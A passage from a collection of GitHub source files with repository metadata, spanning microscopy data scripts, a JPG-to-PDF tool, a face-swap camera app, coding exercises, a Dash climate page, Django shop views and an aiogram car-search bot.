all_button=True)\n selected_paths = selector.paths\n TIFFs_path = beyond_listdir_pos.TIFFs_paths[0]\n\nls_TIFFs_path = os.listdir(TIFFs_path)\n\npos_foldernames = [p for p in ls_TIFFs_path\n if p.find('Position_') != -1\n and os.path.isdir(os.path.join(TIFFs_path, p))]\npos_path = os.path.join(TIFFs_path, pos_foldernames[0])\nscan_run_num = prompts.scan_run_nums(vNUM)\nrun_nums = scan_run_num.scan(pos_path)\nif len(run_nums) > 1:\n run_num = scan_run_num.prompt(run_nums,\n msg='Select run number to concatenate: ')\nelse:\n run_num = 1\n\nspotMAX_data_foldername = f'spotMAX_{vNUM}_run-num{run_num}'\n\nrs = replace_or_skip()\n\nfor selected_path in tqdm(selected_paths, ncols=100, unit='experiment'):\n foldername = os.path.basename(selected_path)\n if foldername == spotMAX_data_foldername:\n if not rs.asked_once:\n rs.replace = askyesno('FileExists', 'This experiment already '\n 'contains spotMAX data!\\n'\n 'Do you want to replace them?'\n )\n rs.asked_once = True\n if rs.replace:\n TIFFs_path = f'{os.path.dirname(selected_path)}/TIFFs'\n else:\n rs.skip = True\n elif foldername == 'TIFFs':\n TIFFs_path = selected_path\n rs.skip = False\n\n if not rs.skip:\n AllPos_summary_df = core.spotMAX_concat_pos(TIFFs_path, vNUM=vNUM,\n run_num=run_num, do_save=True)\n\n print('')\n print(f'Loading all dataframes from {selected_path}...')\n # Iterate position folders and concatenate dataframes\n AllPos_summary_df.load_df_from_allpos(vNUM=vNUM, run_num=run_num)\n\n\n print('Generating big DataFrame...')\n\n (ellips_test_df_moth, ellips_test_df_bud,\n ellips_test_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.ellips_test_df_li)\n\n (p_test_df_moth, p_test_df_bud,\n p_test_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.p_test_df_li)\n\n (p_ellips_test_df_moth, p_ellips_test_df_bud,\n p_ellips_test_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.p_ellips_test_df_li)\n\n if AllPos_summary_df.spotfit_df_li:\n (spotfit_df_moth, spotfit_df_bud,\n spotfit_df_tot) = AllPos_summary_df.generate_bud_moth_tot_dfs(\n AllPos_summary_df.spotfit_df_li)\n\n print('Saving all positions concantenated data...')\n AllPos_summary_df.save_AllPos_df(ellips_test_df_moth,\n '1_AllPos_ellip_test_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(ellips_test_df_bud,\n '1_AllPos_ellip_test_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(ellips_test_df_tot,\n '1_AllPos_ellip_test_TOT_data.csv')\n\n AllPos_summary_df.save_AllPos_df(p_test_df_moth,\n '2_AllPos_p-_test_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(p_test_df_bud,\n '2_AllPos_p-_test_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(p_test_df_tot,\n '2_AllPos_p-_test_TOT_data.csv')\n\n AllPos_summary_df.save_AllPos_df(p_ellips_test_df_moth,\n '3_AllPos_p-_ellip_test_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(p_ellips_test_df_bud,\n '3_AllPos_p-_ellip_test_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(p_ellips_test_df_tot,\n '3_AllPos_p-_ellip_test_TOT_data.csv')\n\n if AllPos_summary_df.spotfit_df_li:\n AllPos_summary_df.save_AllPos_df(spotfit_df_moth,\n '4_AllPos_spotfit_MOTH_data.csv')\n AllPos_summary_df.save_AllPos_df(spotfit_df_bud,\n '4_AllPos_spotfit_BUD_data.csv')\n AllPos_summary_df.save_AllPos_df(spotfit_df_tot,\n '4_AllPos_spotfit_TOT_data.csv')\n\n spotMAX_inputs_path = AllPos_summary_df.analysis_inputs_path\n AllPos_summary_df.save_ALLPos_analysis_inputs(spotMAX_inputs_path)\n\n print(f'Files save to {AllPos_summary_df.spotMAX_data_path}')\n print('')\n","repo_name":"SchmollerLab/SeelMito","sub_path":"src/concat/concat_AllPos.py","file_name":"concat_AllPos.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72086504040","text":"import os\nfrom fpdf import FPDF\n\npdf = FPDF()\nimagelist = [] \n\n# Function that rename file from format string_X to string_0X because list.sort orders the numbers this way: 1, 11, 12, 2, 21... \n# We need to put a zero to sort it correctly: 01, 02, 03 .., 11, 12..\n\ndef rename_file(full_path, filename):\n if filename[-6] == '_':\n newname = full_path.replace(f\"_{filename[-5]}.\", f\"_0{filename[-5]}.\") \n os.rename(full_path, newname)\n\n return newname\n else:\n return full_path # If the number is not to be changed, it is returned as before\n \n\n# Function to add images to a list \n\ndef add_files(folder):\n for dirpath, dirnames, filenames in os.walk(folder):\n for filename in filenames:\n\n full_path = os.path.join(dirpath, filename) \n image_name = rename_file(full_path, filename) # Rename the file if required\n imagelist.append(image_name)\n\n imagelist.sort() # Sort the images by name\n\n print(\"\\nFound \" + str(len(imagelist)) + \" image files. Converting to PDF....\\n\")\n\n\ndef create_pdf(name):\n for image in imagelist:\n pdf.add_page()\n pdf.image(image, 0, 0, 210, 297) # Dimensions of an A4 size sheet.\n\n pdf.output(name, \"F\") # Save the PDF.\n\n print(\"PDF generated successfully!\")\n\n\n\n# inputs\n\nfolder = input(\"Enter the path to the folder of images you want to convert to pdf: \") # Folder containing all the images\nname = input(\"Enter the name of the document to create (name.pdf): \") # Name of the PDF file to generate\n\n\nadd_files(folder)\ncreate_pdf(name)\n","repo_name":"cynthiatcelorio/JPG_to_PDF_converter","sub_path":"jpg_to_pdf.py","file_name":"jpg_to_pdf.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5512361799","text":"import cv2\r\nfrom managers import WindowManager, CaptureManager\r\nimport rects\r\nfrom trackers import FaceTracker\r\n\r\nclass Camera(object):\r\n\r\n def __init__(self):\r\n self._windowManager = WindowManager('Cameo', self.onKeypress)\r\n self._captureManager = CaptureManager(\r\n cv2.VideoCapture(0), self._windowManager, True)\r\n self._faceTracker = FaceTracker()\r\n self._shoulddrawRects = False\r\n\r\n def run(self):\r\n \"\"\"Run the main loop\"\"\"\r\n self._windowManager.createWindow()\r\n while self._windowManager.isWindowCreated:\r\n self._captureManager.enterFrame()\r\n frame = self._captureManager.frame\r\n\r\n #Swapping faces in a camera feed\r\n self._faceTracker.update(frame)\r\n tracked_faces = self._faceTracker.faces\r\n face_rects = []\r\n for tf in tracked_faces:\r\n face_rects.append(tf.faceRect)\r\n rects.swapRects(frame, frame, face_rects)\r\n \r\n if self._shoulddrawRects:\r\n self._faceTracker.drawRects(frame)\r\n\r\n self._captureManager.exitFrame()\r\n self._windowManager.processEvents()\r\n \r\n def onKeypress(self, keycode):\r\n \"\"\"Handle a keypress\r\n \r\n space -> Take a screenshot.\r\n tab -> Start/stop recording a screencast\r\n escape -> Quit\r\n x -> Start/stop drawing rectangles\r\n \"\"\"\r\n if keycode == 32: #space\r\n self._captureManager.writeImage('screenshot.png')\r\n elif keycode == 9: #tab\r\n if not self._captureManager.isWritingVideo:\r\n self._captureManager.startWritingVideo('screencast.mp4')\r\n \r\n else:\r\n self._captureManager.stopWritingVideo()\r\n elif keycode == 120: #x\r\n self._shoulddrawRects = not self._shoulddrawRects\r\n\r\n elif keycode == 27: #escape\r\n self._windowManager.destroyWindow()\r\n \r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n Camera().run()\r\n print(cv2.__file__)\r\n\r\n\r\n\r\n","repo_name":"prateekb1912/face-tracker-and-swapper","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38679241345","text":"\r\n\"\"\"\r\n-->*args are Non Keyword Arguments\r\n--->*args is used to which allow us to pass the variable number of \r\nnon keyword arguments to function.\r\n--->In the function, we should use an asterisk * before the parameter name to pass \r\nvariable length arguments.\r\n--->The arguments are passed as a tuple and these passed arguments make tuple inside the function with same name as the parameter excluding asterisk *.\"\"\"\r\ndef addition(*args):\r\n z = 0\r\n for num in args:\r\n z += num\r\n print(z)\r\n\"\"\"\r\n--->**kwargs are Keyword Arguments\r\n--->It allows us to pass the variable length of keyword arguments to the function.\r\n--->In the function, we use the double asterisk ** before the parameter name to denote \r\nthis type of argument. \r\n--->The arguments are passed as a dictionary and these arguments make a dictionary \r\ninside function with name same as the parameter excluding double asterisk **.\r\n\"\"\"\r\ndef printinfo( **inputdata):\r\n for key, value in inputdata.items(): #read items in dictionary\r\n print(\"{} is {}\".format(key,value))\r\n \r\n\r\n# Now you can call printinfo, addition function\r\naddition(4, 5)#non keyword arguments\r\naddition(2, 3, 4)\r\naddition(3, 5, 10, 6)\r\nprintinfo( name=\"miki\",age=50, )# keyword arguments\r\nprintinfo( name=\"miki\" ,sal=20000,age=20)\r\n\r\n\"\"\"\r\n-->*args passes variable number of non-keyworded arguments list and on which \r\noperation of the list can be performed.\r\n--->**kwargs passes variable number of keyword arguments dictionary to function \r\non which operation of a dictionary can be performed.\r\n\"\"\"","repo_name":"sahityasree/automation_coding_test","sub_path":"python/args,kargs.py","file_name":"args,kargs.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5439869081","text":"class DataConversion():\r\n \"\"\"\r\n Date:2020.10.05\r\n Purpose: Data conversion\r\n Writer: kcs / katd6@naver.com\r\n \"\"\"\r\n \r\n\r\n def __init__(self,dataFile,skipRows,nRows,useCols,tumorType):\r\n \"\"\"\r\n skiprows= 생략할 행 수 \r\n nRows=mouse n 수\r\n useCols= tumour Volume 측정일수 \r\n tumorType= 암종 \r\n \"\"\"\r\n self._skipRows=skipRows\r\n self._nRows=nRows\r\n self._useCols=useCols\r\n self._dataFile=dataFile\r\n self._tumorType=tumorType\r\n\r\n def dataConvert(self):\r\n data=pd.read_excel(self._dataFile,skiprows=self._skipRows,nrows=self._nRows,usecols=self._useCols)\r\n y=pd.concat([data.iloc[:,[0]],data.iloc[:,[1]]],axis=1)\r\n y[\"Day\"]=1\r\n y.columns=[\"Group\",\"Tumor_volume\",\"Day\"]\r\n for i in range(1,len(data.columns)-1):\r\n x=pd.concat([data.iloc[:,[0]],data.iloc[:,[i+1]]],axis=1) \r\n x[\"Day\"]=i+1\r\n x.columns=[\"Group\",\"Tumor_volume\",\"Day\"]\r\n y=pd.concat([x,y],axis=0)\r\n print(\"변환된 {} Tumor.xlsx 파일이 생성되었습니다.\".format(self._tumorType))\r\n return y.to_excel(\"{} Tumor.xlsx\".format(self._tumorType))\r\n\r\n def __call__(self):\r\n return self.dataConvert()\r\n\r\n","repo_name":"devcs96/AsanMedicalCenter","sub_path":"DataConversion.py","file_name":"DataConversion.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73362972839","text":"import dash_core_components as dcc\nimport dash_html_components as html\n\nimport dash_bootstrap_components as dbc\n\nimport pathlib\nimport page_builder as pb\nfrom settings import *\nfrom charts import empty_chart, figure_2_8, map_2_4\n\nchapter_num = '2.4'\nbannerImgSrc = IMAGES_PATH+'AtmosphericSections/Pressure_Tomasz_Szumski_DSC_9880.JPG'\nbannerImgCredit = 'Tomasz Szumski'\n\nintroText = \"\"\"\nAtmospheric pressure is a key meteorological variable for monitoring the \nclimate system, as the local and large-scale atmospheric circulation patterns \nare driven by differences in air pressure. Changes in large-scale pressure \npatterns can affect local and regional weather. \n \"\"\"\nbulletPoint1 = \"\"\"\nAn understanding of atmospheric pressure distributions is required for the \nlong-term simulations of past weather and climate known as reanalyses. This \nunderstanding is also fundamental for weather forecasting. \n \"\"\"\nbulletPoint2 = \"\"\"\nResources are required to digitise older records and carry out comprehensive \ntime series analysis, which would help in understanding if and how storm \ntracks are changing.\n \"\"\"\nbulletPoints = [bulletPoint1, bulletPoint2]\ntrendChartTitle = 'Annual and Monthly Surface Pressure - Valentia'\ntrendChart = figure_2_8()\n\ntrendCaption = \"\"\"\nMonthly and annual minimum, average and maximum surface pressure at Valentia \nObservatory, Co. Kerry (1940–2019). Little variation is seen in the average \nseries. However, maximum and minimum series show greater variability, \nparticularly the minimum values. This behaviour is linked to mid-latitude \ncyclones or low-pressure systems that frequently pass over Ireland. The very \nlow pressure observed in December 1989 was associated with an Atlantic \ndepression that passed over Ireland, causing some damage due to high seas, \nhigh tides and heavy rain.\n \"\"\"\n\ninfrastructureText = \"\"\"\nAtmospheric pressure measurements are taken automatically at the 25 \nsynoptic weather stations (red dots) operated by Met Éireann. Pressure is \nalso measured at the Irish Marine Data Buoy Observation Network stations \n(orange dots), the first of which was deployed in 2000. To allow for \ncomparison between measurements at different locations and elevations, all \npressure readings are converted to mean sea level (msl) pressure.\n \"\"\"\n\ninfrastructureMap = map_2_4()\n\ninfoLinks = [\n {'text': 'Surface Pressure Essential Climate Variable (ECV) Factsheet',\n 'url': 'https://gcos.wmo.int/en/essential-climate-variables/pressure'},\n {'text': 'Met Éireann historical data',\n 'url': 'https://www.met.ie/climate/available-data/historical-data'},\n {'text': 'Met Éireann information on atmospheric pressure measurements',\n 'url': 'https://www.met.ie/climate/what-we-measure/atmospheric-pressure'},\n {'text': 'Information from the Irish Marine Data Buoy Observation Network',\n 'url': 'http://www.marine.ie/Home/site-area/data-services/real-time-observations/irish-marine-data-buoy-observation-network'},\n {'text': 'Information on Valentia Observatory',\n 'url': 'https://www.met.ie/about-us/our-history/valentia-observatory'},\n]\n\n\n########################################################################################################################\nchapter_dict = next(\n (item for item in CHAPTERS if item['chapter-num'] == chapter_num), None)\n\n\ndef create_layout(app):\n return html.Div(\n children=[\n pb.build_banner(bannerImgSrc,\n bannerImgCredit,\n chapter_dict\n ),\n pb.build_breadcrumb(chapter_dict),\n pb.build_nav(chapter_dict),\n pb.build_intro(introText,\n bulletPoints,\n chapter_dict\n ),\n pb.build_trend(trendChartTitle,\n trendChart,\n trendCaption,\n chapter_dict\n ),\n pb.build_infrastructure(infrastructureText,\n infrastructureMap,\n chapter_dict\n ),\n pb.build_info(infoLinks,\n chapter_dict),\n\n pb.build_nav_carousel(chapter_dict)\n ])\n","repo_name":"ClimateIreland/CI-Climate-Status-Tool","sub_path":"dash_app/pages/_2_4_AtmosphericPressure.py","file_name":"_2_4_AtmosphericPressure.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42404318379","text":"n = 0\n\ndef move(me, enemies, bullets, bonuses, m):\n global n\n\n n += 1\n\n if me['pos'][0]==25:\n for k in range(100):\n if (n // 110) % 2:\n m.up()\n else:\n m.down()\n if me['pos'][0] == 775:\n for k in range(100):\n if (n // 110) % 2:\n m.down()\n else:\n m.up()\n\n enemy=enemies[0]\n m.shot(enemy['pos'][0], enemy['pos'][1])","repo_name":"pasha9819/tank_bot","sub_path":"boto2.py","file_name":"boto2.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18353760151","text":"import numpy as np\r\n\r\ndef build_matrix(n: int) -> list:\r\n M = np.zeros((n, n), np.int32)\r\n M[int(np.floor(len(M))/2), int(np.floor(len(M))/2)] = 1\r\n \r\n counter = 2\r\n lap = 0\r\n x, y = int(np.floor(len(M))/2), int(np.floor(len(M))/2)\r\n \r\n for i in range(int(np.floor(len(M))/2)):\r\n lap += 1\r\n \r\n x, y = x+1, y\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for j in range(2*lap - 1):\r\n x, y = x, y+1\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for k in range(2*lap):\r\n x, y = x-1, y\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for l in range(2*lap):\r\n x, y = x, y-1\r\n M[y, x] = counter\r\n counter += 1\r\n \r\n for m in range(2*lap):\r\n x, y = x+1, y\r\n M[y, x] = counter\r\n counter += 1\r\n return M\r\n\r\nA = build_matrix(1001)\r\n\r\nsum_diag, sum_anti = 0, 0\r\n\r\nfor a in range(len(A)):\r\n sum_diag += A[a, a]\r\n sum_anti += A[a, -(a+1)]\r\n\r\nprint(sum_diag + sum_anti - 1)\r\n","repo_name":"colo1701/projecteuler.net_python","sub_path":"pe_028.py","file_name":"pe_028.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13960573030","text":"t=int(input())\nwhile t!=0:\n\tn=int(input())\n\tlist1=list(int(num) for num in input().split())[:n]\n\n\tb=[]\n\tc=0\n\tfor i in list1:\n\t\tif i not in b:\n\t\t\tb.append(i)\t\t\t\t\t\n\t\telse:\n\t\t\tc+=1\t\t\t\t\n\tt-=1\n\tprint(c)","repo_name":"Tarique-web/CODECHEF-PYTHON-CODE-","sub_path":"Voting Frouds/Voting_Frouds.py","file_name":"Voting_Frouds.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12729032021","text":"\"\"\"\nDescription: https://code.google.com/codejam/contest/dashboard?c=6234486#s=p0\n\nSolution: construct an undirected graph where the nodes are villains' names,\nand edges indicate the fact that the villains don't like each other.\n\nThen check if graph is bipartite by finding a 2-coloring of the graph.\n\"\"\"\n\nfrom collections import defaultdict\nimport sys\n\ndef build_graph(edges, unordered=False):\n \"\"\"Takes some edges and constructs a graph in its adjacency list\n representation.\n\n edges -- an iterable of pairs of nodes\n unordered -- if `True`, will construct an unordered graph\n \"\"\"\n\n edges = iter(edges)\n graph = defaultdict(list)\n\n for _ in range(num_pairs):\n a, b = next(edges)\n\n graph[a].append(b)\n if unordered:\n graph[b].append(a)\n\n return graph\n\ndef check_bipartite(graph):\n \"\"\"Checks if a given graph is bipartite, that is, if it can be partitioned\n into two sets of nodes, such that there are no edges between nodes within\n each set, only edges between nodes on different sides.\n\n graph -- adjacency list representation of the graph\n \"\"\"\n\n colors = {}\n\n def bfs(node):\n if node in colors:\n return True\n\n colors[node] = 1\n\n queue = [node]\n while queue:\n node = queue.pop()\n\n color = colors[node]\n neighbor_color = -1 * color\n\n for neighbor in graph[node]:\n if neighbor in colors:\n if colors[neighbor] != neighbor_color:\n return False\n else:\n colors[neighbor] = neighbor_color\n queue.insert(0, neighbor)\n\n return True\n\n for node in graph.keys():\n if not bfs(node):\n return False\n\n return True\n\nfin = sys.stdin\nfout = sys.stdout\n\ntest_cases = int(next(fin))\n\nfor case in range(test_cases):\n num_pairs = int(next(fin))\n\n stripped_lines = map(str.strip, fin)\n edges = map(str.split, stripped_lines)\n graph = build_graph(edges, unordered=True)\n\n answer = 'Yes' if check_bipartite(graph) else 'No'\n print(f'Case #{case + 1}: {answer}', file=fout)\n","repo_name":"GabrielMajeri/competitive-programming","sub_path":"kickstart-2015/practice/bad_horse.py","file_name":"bad_horse.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16063211611","text":"import MeCab\nfrom dai4syou import No30\n\nm = No30.mapping_MeCab(\"neko.txt.mecab\")\n\nresult = []\n\nfor words in m:\n for word in words:\n # if word[\"pos\"] == \"動詞\":\n # print(word[\"surface\"])\n # print(word[\"base\"])\n if word[\"pos\"] == \"名詞\" and word[\"pos1\"] == \"サ変接続\":\n result.append(word[\"surface\"])\n\nprint(result)\n","repo_name":"take9999/knock100","sub_path":"dai4syou/No31-33.py","file_name":"No31-33.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17892960372","text":"class Commands:\n hdmi_keep_on = 'echo -e ' + '\\'\\\\033[9;0]\\'' + ' >> /dev/tty1'\n switch_to_tty3 = 'chvt 3'\n clear = 'clear'\n\n screen_on_off = 'tvservice -o'\n\n get_hardware_temp = 'cat /sys/class/thermal/thermal_zone0/temp'\n\n wlan_signal = 'iwconfig wlan0'\n grep_wlan_signal = 'grep -i signal'\n","repo_name":"rosenberg-c/public_rpi_styra_src","sub_path":"services/requests/py/requests/utils/temp/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31156156003","text":"from django.shortcuts import render, redirect\nfrom .models import Alimentos, Boleta, detalle_boleta\nfrom .forms import ItemForm\nfrom .forms import RegistroUserForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Max\nfrom pawpatron.compra import Carrito\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nimport io\nfrom django.http import HttpResponse\nfrom django.template.loader import render_to_string\n\n\n\n# Create your views here.\ndef index(request):\n return render(request,'index.html')\n\ndef knowus(request):\n return render(request,'knowus.html')\n\ndef apires(request):\n return render(request,'apires.html')\n\ndef store(request):\n MAX_ITEMS = 6 # Número máximo de elementos a mostrar por página\n page = request.GET.get('page', 1) # Obtener el número de página actual de la consulta GET\n\n alimentos = Alimentos.objects.all() # Obtener todos los elementos\n\n paginator = Paginator(alimentos, MAX_ITEMS) # Crear un objeto Paginator con los elementos\n try:\n alimentos = paginator.page(page) # Obtener la página actual\n except PageNotAnInteger:\n alimentos = paginator.page(1) # Si el número de página no es un entero, mostrar la primera página\n except EmptyPage:\n alimentos = paginator.page(paginator.num_pages) # Si la página está vacía, mostrar la última página\n\n carrito_compra = Carrito(request)\n total_con_envio, impuesto = carrito_compra.calcular_total_general() # Calcular el total general\n \n return render(request, 'store.html', {'total_con_envio': total_con_envio,'alimentos': alimentos, 'impuesto': impuesto})\n\n\n\n\n@login_required\ndef crear(request):\n if request.method == \"POST\":\n itemform = ItemForm(request.POST, request.FILES) # Asegúrate de incluir request.FILES para manejar la imagen\n if itemform.is_valid():\n item = itemform.save(commit=False) # Guarda el formulario sin commit para realizar modificaciones adicionales\n item.categoria_id = request.POST['categoria'] # Asigna la categoría seleccionada desde el formulario\n item.save() # Guarda el objeto 'item' en la base de datos\n return redirect('store') # Redirige a la página 'store' después de guardar los datos\n else:\n itemform = ItemForm()\n return render(request, 'crear.html', {'itemform': itemform})\n\n\n@login_required\ndef eliminar(request, id):\n itemEliminado=Alimentos.objects.get(itemid=id) #buscamos un vehiculo por la patentes\n itemEliminado.delete()\n return redirect('store')\n\n\n\n\n\n\ndef registrar(request):\n data={\n 'form':RegistroUserForm()\n }\n if request.method==\"POST\":\n formulario=RegistroUserForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n user=authenticate(username=formulario.cleaned_data[\"username\"], password=formulario.cleaned_data[\"password1\"])\n login(request,user)\n return redirect ('index')\n data[\"form\"]=formulario \n return render(request,'registrar.html', data)\n\ndef mostrar(request):\n items=Alimentos.objects.all()\n datos={\n 'items':items\n }\n return render(request,'store.html', datos)\n\ndef buscar_alimentos(request):\n if 'q' in request.GET:\n termino_busqueda = request.GET['q']\n alimentos = Alimentos.objects.filter(marca__icontains=termino_busqueda)\n else:\n alimentos = Alimentos.objects.all()\n\n context = {'alimentos': alimentos}\n return render(request, 'store.html', context)\n\n@login_required\ndef modificar(request, item_id):\n itemMod = get_object_or_404(Alimentos, itemid=item_id)\n\n if request.method == \"POST\":\n formulario = ItemForm(data=request.POST, files=request.FILES, instance=itemMod)\n\n if formulario.is_valid():\n formulario.save()\n return redirect('store')\n\n else:\n formulario = ItemForm(instance=itemMod)\n\n datos = {\n 'form': formulario,\n 'itemMod': itemMod\n }\n\n return render(request, 'modificar.html', datos)\n\n\ndef agregar_producto(request,id):\n carrito_compra= Carrito(request)\n alimento =Alimentos.objects.get(itemid=id)\n carrito_compra.agregar(Alimentos=alimento)\n return redirect('store')\n\ndef eliminar_producto(request, id):\n carrito_compra= Carrito(request)\n alimento =Alimentos.objects.get(itemid=id)\n carrito_compra.eliminar(Alimentos=alimento)\n return redirect('store')\n\n\n\ndef restar_producto(request, id):\n carrito_compra= Carrito(request)\n alimento =Alimentos.objects.get(itemid=id)\n carrito_compra.restar(Alimentos=alimento)\n return redirect('store')\n\ndef limpiar_carrito(request):\n carrito_compra= Carrito(request)\n carrito_compra.limpiar()\n return redirect('store') \n\n@login_required\ndef generarBoleta(request):\n precio_total = 0\n for key, value in request.session['carrito'].items():\n precio_total += int(value['precio']) * int(value['cantidad'])\n \n # Calcular el monto de impuestos (por ejemplo, 10%)\n impuestos = precio_total * 0.1\n \n # Calcular el total incluyendo los impuestos\n total_con_impuestos = int(precio_total + impuestos + 1200)\n \n boleta = Boleta(total=total_con_impuestos)\n boleta.save()\n \n productos = []\n for key, value in request.session['carrito'].items():\n producto = Alimentos.objects.get(itemid=value['Alimentos_id'])\n cant = value['cantidad']\n subtotal = cant * int(value['precio'])\n detalle = detalle_boleta(id_boleta=boleta, itemid=producto, cantidad=cant, subtotal=subtotal)\n detalle.save()\n productos.append(detalle)\n \n producto.cantidad_disponible -= cant\n producto.save()\n \n datos = {\n 'productos': productos,\n 'boleta': boleta,\n 'fecha': boleta.fechaCompra,\n 'total': boleta.total\n }\n \n request.session['boleta'] = boleta.id_boleta\n carrito = Carrito(request)\n carrito.limpiar()\n\n # Renderizar la plantilla 'detallecarrito.html' con los datos de la boleta\n return render(request, 'detallecarrito.html', datos)\n\ndef descargarBoleta(request, boleta_id):\n # Obtener los datos de la boleta\n boleta = Boleta.objects.get(id_boleta=boleta_id)\n productos = detalle_boleta.objects.filter(id_boleta=boleta)\n\n # Generar los datos para la plantilla\n datos = {\n 'boleta': boleta,\n 'productos': productos,\n 'fecha': boleta.fechaCompra,\n 'total': boleta.total\n }\n\n # Generar contenido del archivo TXT utilizando una plantilla\n contenido = render_to_string('boleta.txt', datos)\n\n # Crear el objeto de respuesta HTTP con el archivo adjunto\n response = HttpResponse(content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"boleta.txt\"'\n\n # Escribir el contenido en la respuesta HTTP\n response.write(contenido)\n\n # Devolver la respuesta HTTP de descarga de la boleta\n return response\n\n\n","repo_name":"Belkr6/ET_PGY3121_Edgard_Guaico_0012D","sub_path":"pawpatron/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18705878295","text":"from aiogram import types, Dispatcher\nimport Filters as filter\nimport requests\nfrom data_base import sqlite\nimport aiohttp\nimport json\nfrom transliterate import translit\nimport sqlite3 as sq\nfrom bs4 import BeautifulSoup as bs\n\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.dispatcher.filters import Text\n\nFind_URL = ''\n\nstorage = MemoryStorage()\n# КЛАСС СОСТОЯНИЙ\nclass FSMFind(StatesGroup):\n model = State()\n full_model = State()\n year = State()\n country = State()\n radius = State()\n search_parameter = State()\n\n# Начало\nasync def Find(message: types.Message):\n\tawait FSMFind.model.set()\n\tawait message.answer(\"Введите марку авто\")\n\t\n# Марка\nasync def model(message: types.Message, state: FSMContext):\n mod = message.text\n if await check_brand(mod):\n await message.answer(\"Некорректная марка автомобиля. Попробуйте ещё раз!\")\n await FSMFind.model.set()\n else:\n async with state.proxy() as date:\n date ['model'] = message.text\n await FSMFind.next()\n await message.answer(\"Введите модель для подбора авто\")\n\n# Модель\nasync def full_model(message: types.Message, state: FSMContext):\n mod = message.text\n mod = mod.title()\n brand = None\n async with state.proxy() as date:\n brand = date ['model']\n if await ckek_model(mod, brand):\n await message.answer(\"Некорректная модель автомобиля. Попробуйте ещё раз!\")\n await FSMFind.full_model.set()\n else:\n async with state.proxy() as date:\n date ['full_model'] = message.text\n await FSMFind.next()\n await message.answer(\"Введите год автомобиля \\n(Вам будут показаны атвомобили с годом выпуска +1 и -1 от введенного)\")\n\n# Год\nasync def year(message: types.Message, state: FSMContext):\n mod = message.text\n if mod.isdigit():\n async with state.proxy() as date:\n date ['year'] = message.text\n await FSMFind.next()\n await message.answer(\"Введите город для подбора авто\")\n else:\n await message.answer(\"Введены некорректные данные. Попробуйте ещё раз!\")\n await FSMFind.year.set()\n\n# Город\nasync def country_find(message: types.Message, state: FSMContext):\n last_message = await message.answer(\"Запрос обрабатывается...\")\n mod = message.text\n URL_for_find = \".drom.ru/\"\n mod = mod.replace(\"/\", \"\")\n mod = mod.replace(\"\\\\\", \"\")\n country_name = await country(URL_for_find, mod)\n flag = await checker(country_name)\n await last_message.delete()\n if (flag):\n async with state.proxy() as date:\n date ['country'] = country_name\n await FSMFind.next()\n await message.answer(\"Введите радиус поиска\") \n\n else:\n await message.answer(\"Город указан не корректно. \\nПовторите попытку!\")\n await FSMFind.country.set()\n\n \n \n# Радиус\nasync def radius(message: types.Message, state: FSMContext):\n async with state.proxy() as date:\n date ['radius'] = message.text\n if message.text.isdigit():\n await FSMFind.next()\n await message.answer(\"Выберите один из предложенных методов сортировки объявлений\\n1 - Цена-пробег\\n2 - Количество владельцев\\n3 - Наличие ограничений на регистрационные действия\")\n else:\n await message.answer(\"Некорректный формат. \\nВы можете ввести только одно целое число без пробелов и знаков препинания! \\nПовторите попытку!\")\n await FSMFind.radius.set()\n\n# Фильтры\nasync def search_parameter(message: types.Message, state: FSMContext):\n mod = 